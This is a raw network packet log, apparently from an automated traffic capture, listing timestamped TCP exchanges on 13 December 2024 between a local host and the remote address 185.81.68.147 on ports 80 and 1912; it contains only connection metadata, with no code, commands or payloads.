                                                                                                                                                                                                Dec 13, 2024 08:19:03.542761087 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.542812109 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.544646025 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.544701099 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.544734955 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.547558069 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.547574997 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.547630072 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.548719883 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.548919916 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.549031973 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.554192066 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.554208994 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.554267883 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.556035042 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.556162119 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.556164980 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.556657076 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.556673050 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.556701899 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.557255983 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.557306051 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.557333946 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.558573961 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.558667898 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.559844971 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.563458920 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.563476086 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.563509941 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.565134048 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.565149069 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.565191031 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.567814112 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.567966938 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.568003893 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.569215059 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.569231987 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.569259882 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.570991993 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.571052074 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.571342945 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.572932959 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.572948933 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.572981119 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.576580048 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.576598883 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.576626062 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.578483105 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.578500032 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.578543901 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.579900980 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.579961061 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.580048084 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.581898928 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.581947088 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.582045078 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.583899021 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.583947897 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.584661961 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.585764885 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.585812092 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.585947037 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.587908030 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.587958097 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.588064909 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.589865923 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.589952946 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.590476990 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.591876984 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.591924906 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.592036963 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.593616009 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.593663931 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.593776941 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.595562935 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.595613003 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.595865011 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.597660065 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.597708941 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.597826004 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.599750996 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.599843979 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.599886894 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.601705074 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.601778030 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.601843119 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.602154970 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.602171898 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.602214098 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.602514029 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.602561951 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.602679014 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.604290962 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.604306936 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.604351044 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.606054068 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.606106997 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.606296062 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.608093023 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.608160973 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.608243942 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.610038042 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.610085964 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.610302925 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.612088919 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.612104893 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.612159014 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.652529955 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.703835011 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.703852892 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.703923941 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.704001904 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.704456091 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.704509974 CET4975580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.748959064 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.823663950 CET8049755185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.869025946 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:03.869118929 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.869198084 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:03.989901066 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:04.432939053 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:04.468314886 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:04.588625908 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:04.901402950 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:04.949605942 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.196091890 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.196140051 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.196156025 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.196213007 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.196275949 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.196290970 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.196306944 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.196322918 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.196326971 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.196355104 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.196495056 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.196543932 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.196549892 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.196566105 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.196609974 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.316378117 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.316396952 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.316468000 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.388098955 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.388298035 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.388475895 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.392388105 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.392410040 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.392479897 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.400871992 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.400887966 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.400968075 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.409168005 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.409356117 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.409418106 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.417661905 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.417678118 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.417748928 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.426047087 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.426064014 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.426131010 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.434333086 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.434483051 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.434575081 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.442919970 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.443049908 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.443109035 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.451361895 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.451702118 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.451797009 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.459726095 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.459742069 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.459805012 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.468009949 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.468091011 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.468149900 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.583806992 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.583825111 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.583894014 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.586158991 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.586174965 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.586230993 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.591114998 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.591245890 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.591301918 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.596236944 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.596252918 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.596328974 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.601254940 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.601272106 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.601325989 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.605988026 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.606081009 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.606137037 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.610821962 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.610949993 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.611011028 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.615608931 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.616194010 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.616251945 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.620484114 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.620646954 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.620707989 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.625243902 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.625340939 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.625395060 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.630126953 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.630240917 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.630320072 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.634983063 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.635195971 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.635253906 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.639866114 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.639883041 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.639950991 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.644613981 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.644644022 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.644705057 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.649471998 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.649487972 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.649548054 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.654313087 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.654340029 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.654400110 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.659195900 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.659212112 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.659265041 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.664164066 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.664180040 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.664243937 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.668730974 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.668833017 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.668885946 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.775978088 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.775998116 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.776079893 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.778040886 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.778070927 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.778131962 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.782274961 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.782286882 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.782345057 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.786123037 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.786237001 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.786298990 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.790191889 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.790556908 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.790612936 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.794090986 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.795368910 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.795455933 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.797974110 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.798043966 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.798091888 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.801608086 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.801781893 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.801842928 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.805325031 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.805397034 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.805459023 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.809120893 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.809173107 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.809231997 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.812829018 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.812840939 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.812895060 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.816529036 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.816539049 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.816679001 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.820240021 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.820251942 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.820312023 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.823899031 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.824032068 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.824093103 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.827614069 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.827625990 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.827712059 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.831250906 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.831264973 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.831350088 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.834949970 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.835010052 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.835104942 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.838695049 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.838706017 CET8049761185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:05.838773966 CET4976180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:05.842286110 CET8049761185.81.68.147192.168.2.11
